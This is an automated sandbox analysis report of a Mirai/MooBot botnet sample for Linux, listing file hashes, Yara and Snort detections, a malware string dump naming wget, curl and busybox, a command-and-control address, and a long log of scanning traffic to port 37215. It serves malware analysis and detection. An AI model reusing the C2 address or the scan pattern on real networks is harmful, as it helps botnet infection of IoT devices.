Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
pBVFNv9jh6.elf

Overview

General Information

Sample name:pBVFNv9jh6.elf
renamed because original name is a hash value
Original sample name:d33deff293c518223d95060d1b65bb6e.elf
Analysis ID:1377640
MD5:d33deff293c518223d95060d1b65bb6e
SHA1:62995bb72649bbdbf9258184e95c0f9a9700e7a2
SHA256:8d5f5035c0de3d2fe423723bfc5e557d27fdbc5a7f9b481c7557e4cfa00c4d37
Tags:32elfgafgytrenesas
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1377640
Start date and time:2024-01-19 18:22:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 28s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:pBVFNv9jh6.elf
renamed because original name is a hash value
Original Sample Name:d33deff293c518223d95060d1b65bb6e.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@21/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: pBVFNv9jh6.elf
Command:/tmp/pBVFNv9jh6.elf
PID:5421
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5436, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5446, Parent: 1400)
  • Default (PID: 5446, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5466, Parent: 1400)
  • Default (PID: 5466, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5477, Parent: 1)
  • systemd-user-runtime-dir (PID: 5477, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
pBVFNv9jh6.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    pBVFNv9jh6.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      pBVFNv9jh6.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x18620:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18634:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18648:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1865c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18670:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18684:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18698:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x186ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x186c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x186d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x186e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x186fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18710:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18724:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18738:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1874c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18760:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18774:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18788:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1879c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x187b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x18620:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18634:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18648:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1865c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18670:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18684:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18698:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x186ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x186c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x186d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x186e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x186fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18710:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18724:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18738:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1874c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18760:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18774:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x18788:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1879c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x187b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: pBVFNv9jh6.elf PID: 5421JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: pBVFNv9jh6.elf PID: 5421Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x5895:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x58a9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x58bd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x58d1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x58e5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x58f9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x590d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5921:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5935:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5949:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x595d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5971:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5985:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5999:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x59ad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x59c1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x59d5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x59e9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x59fd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5a11:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x5a25:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.13103.245.236.14652710199902030490 01/19/24-18:23:09.378761
            SID:2030490
            Source Port:52710
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.14652664199902030490 01/19/24-18:23:06.608817
            SID:2030490
            Source Port:52664
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.14651780199902030490 01/19/24-18:23:01.842370
            SID:2030490
            Source Port:51780
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.14652994199902030490 01/19/24-18:23:22.907218
            SID:2030490
            Source Port:52994
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.14652868199902030490 01/19/24-18:23:17.142866
            SID:2030490
            Source Port:52868
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.14653464199902030490 01/19/24-18:23:33.676243
            SID:2030490
            Source Port:53464
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: pBVFNv9jh6.elfAvira: detected
            Source: pBVFNv9jh6.elfReversingLabs: Detection: 57%
            Source: pBVFNv9jh6.elfString: wgetcurlbusyboxechocatnano/proc/proc/%d/cmdlinerabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt3f

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51780 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:52664 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:52710 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:52868 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:52994 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:53464 -> 103.245.236.146:19990
            Source: global trafficTCP traffic: 147.46.224.158 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52968 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52968
            Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.220.229.48:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.50.201.46:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 155.121.180.100:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.18.19.54:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.198.118.5:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.215.254.37:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 191.103.36.68:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.122.60.215:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 210.226.160.253:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.79.62.249:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.159.247.152:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 135.190.2.32:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.114.188.153:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.159.221.39:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.36.95.87:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.61.127.79:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.59.65.7:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.152.231.179:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.212.96.180:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.215.28.103:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 8.210.226.45:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 204.134.166.190:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 79.9.215.107:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 173.47.153.24:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 66.132.254.22:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.109.65.129:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.41.242.109:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.19.33.157:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.241.116.194:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.5.24.122:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.222.239.96:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.244.194.166:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.119.252.161:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 119.29.90.130:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 86.112.6.204:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 131.170.48.83:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.127.52.194:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 158.228.104.8:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.119.133.70:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.204.231.23:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.188.71.220:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.235.81.11:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 182.152.121.174:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.58.75.15:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.202.159.157:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.227.94.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 110.3.42.96:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.12.223.13:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.61.163.83:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.224.83.193:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.142.214.113:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.146.60.51:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.151.120.29:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.26.20.21:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.171.233.131:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.168.233.187:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.104.105.179:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 52.133.92.129:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.186.140.114:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.197.84.181:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 79.121.200.70:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.208.174.145:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.21.131.227:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.88.54.190:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 60.156.154.77:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.180.13.0:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.98.146.53:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.254.59.227:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.241.137.12:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.48.107.71:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 198.107.35.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.62.59.98:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.81.92.5:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.89.167.247:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.228.207.131:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 95.208.109.229:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.106.166.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.235.23.76:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.94.183.242:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.186.161.112:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.225.206.212:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.195.239.113:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.176.219.204:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 46.116.217.174:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 48.93.40.222:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.131.158.233:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.206.120.76:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 179.52.244.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.190.168.207:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 160.21.210.31:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 106.52.1.177:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.154.4.150:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 130.197.141.4:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.8.229.231:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 134.88.10.11:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.65.183.182:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.173.24.131:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.246.160.31:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.249.125.144:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.116.15.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.234.31.75:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.179.188.148:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 189.3.203.105:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.86.13.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 176.50.90.220:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.73.200.118:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.193.162.76:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.212.101.25:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 79.140.219.112:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.161.33.30:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.78.178.152:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.35.228.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 2.147.196.159:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.244.194.17:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 118.84.40.122:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.28.206.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.98.45.49:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.173.120.3:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.200.108.214:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.112.59.30:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 99.252.231.134:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.99.163.160:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.59.5.180:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.23.220.32:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.58.99.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.205.186.130:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.242.118.154:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.94.1.147:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 149.248.250.76:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.219.76.19:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.166.118.62:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.169.124.3:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.105.208.132:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.25.104.20:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.148.109.60:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.85.5.178:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.37.93.107:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.149.113.45:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.73.130.23:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.9.71.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.159.75.35:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 49.174.198.38:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 188.25.229.161:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.5.25.250:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.115.171.222:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 196.197.170.142:37215
